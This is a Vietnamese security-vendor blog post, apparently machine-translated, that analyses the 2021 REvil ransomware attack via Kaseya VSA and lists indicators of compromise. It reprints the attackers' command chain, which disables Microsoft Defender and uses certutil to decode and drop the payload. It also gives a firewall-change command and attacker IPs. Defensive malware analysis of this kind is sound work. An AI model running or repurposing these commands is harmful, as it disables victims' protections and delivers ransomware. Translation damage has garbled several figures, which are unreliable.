• sản phẩm và dịch vụ
        • đám mây

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Tại chỗ

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Nền tảng

          • Malware Analysis Platform
        • Doanh nghiệp nhỏ

          • SOHO Total Edition
        • Dịch vụ

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • An ninh mạng & Data Privacy Awareness
  • Giải pháp
    • BFSI
    • có chất lượng
    • Chính phủ
    • phù hợp túi tiền
    • CNTT
    • Sản xuất Chế tạo
  • Tên Công Ty
    • Giới thiệu Seqrite
    • SỰ LÃNH ĐẠO
    • Giải thưởng & Chứng nhận
    • Thông cáo báo chí
  • Đối tác
    • Chương trình Đối tác
    • Tìm đối tác
    • Trở thành đối tác
  • Trợ giúp
  • Trung Tâm Tài Liệu
    • Blogs
    • Giấy trắng
    • Các bảng số liệu
    • Case Study
    • Báo cáo Đe doạ
    • hướng dẫn sử dụng
    • góc nhìn
    • Sự hiểu biết Data Privacy
    • Kiểm tra điểm rủi ro của bạn
    • Đối thoại DPDP
    • Giờ riêng tư
Seqrite Phòng thí nghiệm Blog
Liên doanh Đang bị tấn công?
  • sản phẩm và dịch vụ
        • đám mây

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Tại chỗ

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Nền tảng

          • Malware Analysis Platform
        • Doanh nghiệp nhỏ

          • SOHO Total Edition
        • Dịch vụ

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • An ninh mạng & Data Privacy Awareness
  • Giải pháp
    • BFSI
    • có chất lượng
    • Chính phủ
    • phù hợp túi tiền
    • CNTT
    • Sản xuất Chế tạo
  • Tên Công Ty
    • Giới thiệu Seqrite
    • SỰ LÃNH ĐẠO
    • Giải thưởng & Chứng nhận
    • Thông cáo báo chí
  • Đối tác
    • Chương trình Đối tác
    • Tìm đối tác
    • Trở thành đối tác
  • Trợ giúp
  • Trung Tâm Tài Liệu
    • Blogs
    • Giấy trắng
    • Các bảng số liệu
    • Case Study
    • Báo cáo Đe doạ
    • hướng dẫn sử dụng
    • góc nhìn
    • Sự hiểu biết Data Privacy
    • Kiểm tra điểm rủi ro của bạn
    • Đối thoại DPDP
    • Giờ riêng tư
Trang chủ  /  ransomware  / REvil trở lại: Đi sâu hơn vào cuộc tấn công Ransomware Kaseya VSA
REvil trở lại: Đi sâu hơn vào cuộc tấn công ransomware Kaseya VSA
15 Tháng Bảy 2021

REvil trở lại: Đi sâu hơn vào cuộc tấn công ransomware Kaseya VSA

Được viết bởi Aravind Raj
Aravind Raj
ransomware

Trong một sự kiện gần đây, Kaseya - nhà cung cấp phần mềm cho các nhà cung cấp dịch vụ (MSP) và đội ngũ CNTT tại Hoa Kỳ đã báo cáo về một cuộc tấn công Chuỗi cung ứng trên toàn thế giới vào ngày 2 tháng 2021 năm 60, lợi dụng Ngày Độc lập Hoa Kỳ làm đòn bẩy vì lực lượng nhân viên giám sát cuộc tấn công sẽ yếu hơn. Nhóm tin tặc đã khai thác lỗ hổng zero-day trong phần mềm Kaseya VSA để triển khai ransomware REvil cho khách hàng. Cuộc tấn công do nhóm REvil thực hiện có thể đã ảnh hưởng đến khoảng XNUMX nhà cung cấp dịch vụ (MSP) và khách hàng doanh nghiệp của họ bằng kỹ thuật chuỗi cung ứng. Những kẻ tấn công đã yêu cầu một khoản tiền chuộc cao cho quá trình giải mã hoặc đe dọa sẽ tiết lộ thông tin nếu họ không trả tiền chuộc.

REvil/Sodinokibi là gì?

REvil/Sodinokibi/Sodin là phiên bản đổi tên của mã độc tống tiền GrandCrab, liên quan đến nhóm GOLD SOUTHFIELD với động cơ tài chính. Nhóm này được biết đến với việc đánh cắp dữ liệu của nạn nhân trước khi mã hóa và đe dọa sẽ công khai nếu tiền chuộc không được trả.

Chúng hoạt động từ tháng 2019 năm 40 và gây ra gần XNUMX% tổng số vụ lây nhiễm ransomware trên toàn cầu. Ban đầu, nhóm này nhắm mục tiêu vào khu vực châu Á và châu Âu, nhưng hiện đã lan rộng ra toàn thế giới.

Khi ransomware mới xuất hiện, nó đã khai thác các lỗ hổng trong máy chủ và các tài sản quan trọng khác của các doanh nghiệp vừa và nhỏ (SMB) cũng như các trình cài đặt phần mềm để khai thác các bộ công cụ. Nhưng giờ đây, chúng đã bắt đầu xu hướng tấn công chuỗi cung ứng. Chúng tôi đã công bố blog liên quan đến GrandCrab, rất giống với REvil tấn công ransomware.

Những kẻ tấn công đã đột nhập bằng cách nào?

Các tin tặc đã phát động cuộc tấn công vào các nhà cung cấp MSP và khai thác lỗ hổng zero-day [CVE-2021-30116] trong các máy chủ VSA tại chỗ. Bằng cách xâm nhập vào Máy chủ VSA, bất kỳ máy khách nào được kết nối sẽ thực hiện bất kỳ tác vụ nào mà máy chủ VSA yêu cầu mà không cần thắc mắc. Kẻ tấn công đứng sau vụ việc này sẽ vô hiệu hóa quyền truy cập quản trị vào VSA sau khi chúng truy cập vào mạng của nạn nhân.

Người ta phát hiện ra rằng những kẻ tấn công đã sử dụng các địa chỉ IP bên dưới để bắt đầu cuộc tấn công bằng cách sử dụng người dùng “agent curl/7.69.1.”

  • 18 [.] 223.199.234
  • 161 [.] 35.239.148
  • 35 [.] 226.94.113
  • 162 [.] 253.124.162

Không giống như vụ tấn công chuỗi cung ứng SolarWinds, máy chủ của Kaseya không có dấu hiệu bị xâm phạm. Nhiều khách hàng của Kaseya là nhà cung cấp dịch vụ (MSP). Tin tặc đã khai thác phiên bản phần mềm tại chỗ và có thể dễ dàng truyền mã độc tống tiền xuống hạ nguồn.

Số tiền mà nhóm này yêu cầu dao động từ 50,000 đến 5 triệu đô la, tùy thuộc vào việc hệ thống có được kết nối với một tên miền hay không. Ngoài ra, chúng còn yêu cầu 70 triệu đô la cho bộ giải mã phổ quát, được đăng tải trên trang web đen của chúng.

 

Chi tiết kỹ thuật về cuộc tấn công zero-day của Kaseya VSA

  1. Giai đoạn đầu bắt đầu khi quá trình độc hại từ Nhà cung cấp dịch vụ được quản lý (MSP) tiếp cận người dùng.
  2. Quy trình VSA triển khai mã hóa có tên “Kaseya VSA Agent Hotfix”, chạy trong hệ thống với quyền quản trị để bỏ qua các biện pháp bảo mật khi xử lý bản cập nhật.
  3. Tập lệnh được thực thi như bên dưới, vô hiệu hóa dịch vụ Microsoft Defender, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio và DisableScriptScanning.
    “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe và c:\kworking\agent.exe

     

  4. Khi bản cập nhật này được xử lý, nó sẽ phân phối tải trọng REvil với trình tải thực thi độc hại “agent.exe”
  5. Agent.exe có chữ ký số hợp lệ được ký bởi “PE03 TRANSPORT LTD” và được ký một ngày trước cuộc tấn công

    Gọi Mpsvc.dll được tải bên ngoài bằng MsMpEng.exe
  6. Sử dụng “MsMpEng.exe”, “Mpscv.dll” được tải phụ để chạy ransomware.
  7. Chuỗi quy trình tổng thể được mô tả như sau

    Quy trình tổng thể

Khi thực hiện Ransomware REvil.

  • Nó bắt đầu quá trình bằng cách giải mã chính nó trong bộ nhớ và trích xuất tệp cấu hình được lưu trữ ở định dạng JSON với các tham số cấu hình như được hiển thị đây.
  • Không giống như các phiên bản khác, tính năng này không xóa "Bản sao Bóng" (Shadow Copies) của Windows, điều mà hầu hết các phần mềm tống tiền thường làm. Việc kích hoạt tính năng này có thể khiến quá trình dừng lại vì nó được hầu hết các công ty phần mềm diệt virus sử dụng như một cơ chế để phát hiện ransomware.
  • Mã hóa AES được sử dụng để mã hóa khóa riêng của cặp khóa riêng-công khai, được tạo cục bộ trên máy của người dùng.
  • Ngược lại, Salsa20 được sử dụng để mã hóa các tập tin của người dùng.

    Lưu cấu hình trong Registry
  • Nó cũng tạo khóa registry “HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter”, nơi lưu trữ các khóa đã tạo. Khóa này chứa một khóa riêng được mã hóa bằng khóa công khai trong cấu hình. Khóa công khai và khóa riêng được mã hóa ở dạng nhị phân. Chuỗi thông tin được mã hóa sau đó được gửi đến máy chủ C2, tại đó một phần mở rộng tệp ngẫu nhiên sẽ được thêm vào các tệp được mã hóa.
  • Bằng cách sử dụng lệnh được cung cấp bên dưới, nó sẽ thêm cài đặt tường lửa của Windows để cho phép hệ thống cục bộ được các máy tính khác phát hiện trên mạng cục bộ.
netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes
  • Quá trình mã hóa bắt đầu bằng nhiều luồng và mã hóa các tệp được cung cấp trong phần mở rộng, bao gồm cả ổ đĩa mạng.
  • REvil sử dụng thuật toán tạo và trao đổi khóa "Elliptic-curve Diffie-Hellman" để tạo cặp khóa riêng tư-công khai. Một khóa bí mật dùng chung được phát triển để sử dụng làm khóa cho các thuật toán mã hóa đối xứng AES và Salsa20.
  • Sau khi thực hiện xong, một tệp ghi chú tiền chuộc sẽ được đưa vào mỗi thư mục với các thủ tục hướng dẫn cách lấy lại các tệp đó.

    Tiền chuộc
  • Việc giải mã chỉ có thể được thực hiện sau khi thanh toán số tiền chuộc vì công cụ giải mã chung vẫn chưa có sẵn.

    Trang giải mã trong dark web

Kết luận

Kaseya đã phát hành bản vá vào ngày 11 tháng XNUMX và cũng đã đưa cơ sở hạ tầng SaaS của VSA trở lại hoạt động. Bản vá có thể được tải xuống từ đâyHọ cũng đã phát hành một công cụ để quét, phát hiện rủi ro khai thác tiềm ẩn trong máy chủ VSA và để quét điểm cuối. Tải về Nó ở đây. Ransomware là vấn đề nghiêm trọng nhất gây gián đoạn hoạt động. Động lực chính của việc này là lợi ích tài chính mà kẻ tấn công nhận được. Chúng ta không thể ngăn chặn các cuộc tấn công có chủ đích nhưng có thể ngăn chặn chúng.

Seqrite Khuyến cáo các tổ chức nên cảnh giác với nguy cơ tấn công ransomware ngày càng gia tăng và chuẩn bị sẵn các kế hoạch ứng phó sự cố cũng như một nhóm có thể xử lý các vấn đề khẩn cấp.

Các cách chủ động để ngăn chặn/hạn chế các loại tấn công này là

  • Bao gồm chuỗi cung ứng trong kế hoạch ứng phó và khắc phục của bạn.
  • Lập bản đồ bối cảnh mối đe dọa.
  • Đảm bảo các nhà cung cấp trong chuỗi cung ứng của bạn có chính sách và quy trình bảo mật được cấu trúc, xác thực và chứng nhận.
  • Duy trì các bản sao lưu hiện tại của dữ liệu có giá trị để giảm thiểu thiệt hại gây ra.

Làm thế nào Seqrite bảo vệ người dùng của nó?

Quick Heal cung cấp các công cụ chủ động để chặn mã độc tống tiền trong đợt tấn công này. Quick Heal phát hiện các mẫu có tên phát hiện sau:

  • Trojanransom.Gen
  • Trojanransom.Sodin
  • Tiền chuộc.Sự trả thù
  • Trojanransom.Encoder
  • Trojan.Agent

Các chỉ số về sự thỏa hiệp (IoC)

Loader

  • 0299e3c2536543885860c7b61e1efc3f
  • 5a97a50e45e64db41049fd88a75f2dd2
  • be6c46239e9c753de227bf1f3428e271
  • 835f242dde220cc76ee5544119562268
  • 18786bfac1be0ddf23ff94c029ca4d63
  • 8535397007ecb56d666b666c3592c26d
  • 561cffbaba71a6e8cc1cdceda990ead4

DLL

  • 78066A1C4E075941272A86D4A8E49471
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • 849fb558745e4089a8232312594b21d2
  • 4a91cb0705539e1d09108c60f991ffcf
  • 7d1807850275485397ce2bb218eff159
  • a560890b8af60b9824c73be74ef24a46
  • a47cf00aedf769d60d58bfe00c0b5421

Tệp cấu hình REvil

Bấm vào đây

dự án

Tư vấn về cuộc tấn công Ransomware chuỗi cung ứng Kaseya VSA

 

 

 

 Bài trướcSeqrite Hé lộ đợt tấn công thứ hai của Chiến dịch SideCopy nhắm vào Ấn Độ...
Bài tiếp theo  Chuyển sang đám mây? Tìm hiểu cách quản lý rủi ro an ninh mạng trên ...
Aravind Raj

Giới thiệu về Aravind Raj

Aravind Raj là Nhà nghiên cứu Bảo mật tại Phòng thí nghiệm Bảo mật Quick Heal. Anh quan tâm đến phân tích phần mềm độc hại, Kỹ thuật đảo ngược, Tự động hóa tác vụ và là một người...

Bài viết của Aravind Raj »

bài viết liên quan

  • Các kỹ thuật ứng phó sự cố tốt nhất đối với các cuộc tấn công ransomware nhằm giảm thiểu thiệt hại.

    2 Tháng Sáu, 2026
  • Cách phục hồi sau cuộc tấn công ransomware mà không cần trả tiền chuộc

    25 Tháng Năm, 2026
  • Tấn công ransomware qua kết nối SMB2 dùng chung và cách bảo vệ bản thân khỏi các mối đe dọa. Seqrite

    11 Tháng ba, 2025
Tác giả nổi bật
  • Seqrite
    Seqrite

    Seqrite là nhà cung cấp giải pháp an ninh mạng doanh nghiệp hàng đầu. Với trọng tâm...

    Đọc thêm bài viết của Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Tôi là một nhà văn nhiệt huyết, thích sáng tạo nội dung về các công nghệ mới nổi và...

    Đọc thêm các bài viết của Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Tôi là một người đam mê an ninh mạng và là một cây bút tận tụy. Với năng khiếu...

    Đọc thêm các bài viết khác của Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar là Tổng giám đốc điều hành của Quick Heal Technologies...

    Đọc thêm các bài viết khác của Sanjay Katkar
Chủ đề
apt (25) Tấn công mạng (36) Tấn công mạng (58) Tấn công mạng (16) Tấn công mạng (15) An ninh mạng (341) an ninh mạng (34) Mối đe dọa mạng (33) mối đe dọa mạng (51) vi phạm dữ liệu (56) vi phạm dữ liệu (29) mất dữ liệu (28) ngăn ngừa mất dữ liệu (34) data privacy (16) bảo vệ dữ liệu (34) bảo mật dữ liệu (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) bảo mật điểm cuối (113) Bảo mật doanh nghiệp (20) Khai thác (13) GDPR (14) phần mềm độc hại (76) phân tích phần mềm độc hại (14) tấn công phần mềm độc hại (23) MDM (27) microsoft (15) MITER ATT & CK (14) Bảo mật mạng (26) Lừa đảo (30) ransomware (69) tấn công ransomware (31) các cuộc tấn công ransomware (31) bảo vệ ransomware (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Dịch vụ (16) phát hiện mối đe dọa (14) Threat Intelbằng cấp (21) UTM (34) Dễ bị tổn thương (16) không tin tưởng (13)
Seqrite Phòng thí nghiệm

Nhà cung cấp giải pháp bảo mật CNTT doanh nghiệp hàng đầu giúp đơn giản hóa bảo mật điểm cuối, dữ liệu và mạng bằng các giải pháp phòng ngừa, phát hiện và ứng phó mối đe dọa tốt nhất trên toàn thế giới.

Đọc thêm về Seqrite

Theo dõi tại:

Theo dõi bản tin của chúng tôi

Cập nhật những xu hướng và thông tin chuyên sâu mới nhất về an ninh mạng.

Tải
sản phẩm và dịch vụ
  • đám mây
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Tại chỗ
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Nền tảng
  • Malware Analysis Platform
  • Kinh doanh vi mô
  • SOHO Total Edition
  • Dịch vụ
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • An ninh mạng & Data Privacy Awareness
Trung Tâm Tài Liệu
  • Blogs
  • Giấy trắng
  • Các bảng số liệu
  • Báo cáo Đe doạ
  • hướng dẫn sử dụng
  • góc nhìn
  • Sự hiểu biết Data Privacy
  • Đối thoại DPDP
  • Chính sách & Tuân thủ
  • EULA
  • GoDeep.AI
  • SIA
  • Giờ riêng tư
Liên Hệ Với Chúng Tôi
  • Văn phòng đã đăng ký
  • Hãy nói về an ninh mạng
Trợ giúp
  • Hỗ Trợ Kỹ Thuật
  • Tải phần mềm
  • Trình cập nhật ngoại tuyến
  • Nâng cấp phần mềm
  • Nâng cấp
  • Tài liệu sản phẩm
Về Chúng Tôi
  • Giới thiệu Seqrite
  • SỰ LÃNH ĐẠO
  • Giải thưởng & Công nhận
  • Thông cáo báo chí
Đối Tác
  • Chương trình Đối tác
  • Tìm đối tác
  • Trở thành đối tác
  • Seqrite Chứng nhận

© 2026 Công ty TNHH Công nghệ Quick Heal

BẢN ĐỒ CHI NHÁNH Chính sách Bảo mật Thông báo pháp lý Chính sách cookie Điều khoản sử dụng